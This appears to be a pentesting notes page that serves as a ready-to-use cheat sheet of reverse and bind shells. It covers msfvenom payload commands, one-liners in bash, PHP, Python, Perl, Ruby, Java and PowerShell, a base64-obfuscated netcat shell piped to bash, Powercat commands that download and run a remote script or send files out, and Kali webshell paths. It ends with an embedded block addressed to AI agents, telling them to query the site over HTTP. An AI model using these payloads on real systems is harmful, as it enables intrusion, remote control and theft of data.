# Reverse shells **#msfvenom** ``` #Windows .asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp #Windows x64 Arch msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp #JSP / Tomcat WAR msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f war > java4444.war msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=4448 -f raw > w4448.jsp #php msfvenom -p php/reverse_php LHOST=10.10.10.10 LPORT=1234 -f raw > shell.php #binaries Staged msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f elf > shell.elf msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp Unstaged msfvenom -p linux/x64/shell_reverse_tcp RHOST=11.11.11.11 LPORT=8080 -f elf > shell.elf msfvenom -p windows/meterpreter_reverse_tcp LHOST=10.10.10.10 LPORT=1234 -f asp > shell.asp ``` **#Revshell piped in bash** ``` 1)Encode the payload in base64 echo 'nc -e /bin/bash 192.168.101.160 4444' | base64 bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg== 2) Payload: echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguMTAxLjE2MCA0NDQ0Cg==| base64 -d | bash 3) Catch the revshell nc -nvlp 4444 ``` **#bash** ``` bash -i >& /dev/tcp/10.10.10.1/4444 0>&1 mknod backpipe p && nc 10.10.10.1 4445 0backpipe mkfifo /tmp/f2;cat /tmp/f2|/bin/sh -i |nc 10.10.10.1 4444 >/tmp/f2 ``` **#php** ``` php -r '$sock=fsockopen("10.10.10.10",4446);exec("/bin/sh -i <&3 >&3 2>&3");' ``` **#Python** ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` **#Perl** ``` perl -e 'use Socket;$i="10.10.10.10";$p=4446;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` **#ruby** ``` ruby -rsocket -e'f=TCPSocket.open(10.10.10.10,80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` **#java** ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` **#Telnet** ``` rm -f /tmp/p; mknod /tmp/p p && telnet 10.10.10.10 80 0/tmp/p ``` **#Kali Webshells** ``` Kali PHP reverse shells and command shells: /usr/share/webshells/php/php-reverse-shell.php #first love /usr/share/webshells/php/php-findsock-shell.php usr/share/webshells/php/findsock.c /usr/share/webshells/php/simple-backdoor.php /usr/share/webshells/php/php-backdoor.php Kali Perl Reverse Shell /usr/share/webshells/perl/perl-reverse-shell.pl /usr/share/webshells/ perl/perlcmd.cgi Kali Cold Fusion Shell /usr/share/webshells/cfm/cfexec.cfm Kali ASP Shell /usr/share/webshells/asp/ Kali JSP Reverse Shell /usr/share/webshells/jsp/jsp-reverse.jsp ``` **#Powershell Reverse shell** ``` Kali: nc -nvlp 443 Windows target: powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out- String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush();}$client.Close()" ``` **#Powershell bind shell** ``` Kali: nc -nv 10.11.0.22 443 Windows target , start a powershell listener: powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes =0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Leng th);$stream.Flush()};$client.Close();$listener.Stop()" ``` **#Powercat** ``` # install with: apt get powercat #Default location:/usr/share/windows-resources/powercat #Transfer powershell script to target or download with: iex (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1') #Powercat file transfer Kali: nc -nvlp 443 Windows:powercat -c 10.10.10.10 -p 443 -i C:\Users\Redcliff\important.txt #Powercat reverse shell Kali: nc -nvlp 443 Windows:powercat -c 10.10.10.10 -p 443 -e cmd.exe #Powercat bind shell Kali : nc 11.11.11.11 443 Windows: powercat -l -p 443 -e cmd.exe #Powercat standalone payload (Base64 encoded) Windows: powercat -c 10.10.10.10 -p 443 -e cmd.exe -ge > encodedreverseshell.ps1 Then: paste entire encoded string with -E flag powershell.exe -E ZgB1AG4AYwB0AGkAbwBuACAAUwB0AHIAZQBhAG0AMQBfAFMAZQB0AHUAcAAKAHsACgAKACAAIAAgACAAcABhAH IAYQBtACgAJABGAHUAbgBjAFMAZQB0AHUAcABWAGEAcgBzACkACgAgACAAIAAgACQAYwAsACQAbAAsACQAcAAs ACQAdAAgAD0AIAAkAEYAdQBuAGMAUwBlAHQAdQBwAFYAYQByAHMACgAg........ Kali: nc -nvlp 443 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/exploitation-deprecated-node/reverse-shells.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.